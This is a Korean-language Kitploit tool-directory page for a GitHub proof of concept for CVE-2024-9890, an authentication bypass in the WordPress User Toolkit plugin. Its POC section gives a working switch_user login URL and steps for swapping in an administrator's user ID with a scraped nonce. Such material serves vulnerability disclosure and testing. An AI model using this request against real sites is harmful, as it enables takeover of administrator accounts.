Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-9890 — User Toolkit <= 1.2.3 - 인증된 (구독자+) 인증 우회 | Kitploit
도구/GitHubGitHub/randomrobbiebf/cve-2024-9890
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubrandomrobbiebf/cve-2024-9890

CVE-2024-9890

User Toolkit <= 1.2.3 - 인증된 (구독자+) 인증 우회

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-9890

User Toolkit <= 1.2.3 - 인증된 (구독자+) 인증 우회

설명:

WordPress용 User Toolkit 플러그인은 1.2.3까지의 버전에서 인증 우회에 취약합니다. 이는 'switchUser' 함수의 부적절한 권한 검사 때문입니다. 이로 인해 구독자 수준 이상의 권한을 가진 인증된 공격자가 관리자와 같은 사이트의 기존 사용자로 로그인할 수 있게 됩니다.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit

POC

root@kitploit:~
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329

자신의 사용자로 로그인하세요. 프로필 페이지의 view-source에서 nonce 값을 가져오세요. user_from 값을 자신의 사용자 ID로 변경하세요. user_id를 관리자의 ID로 변경하세요. 완료!

도구 다운로드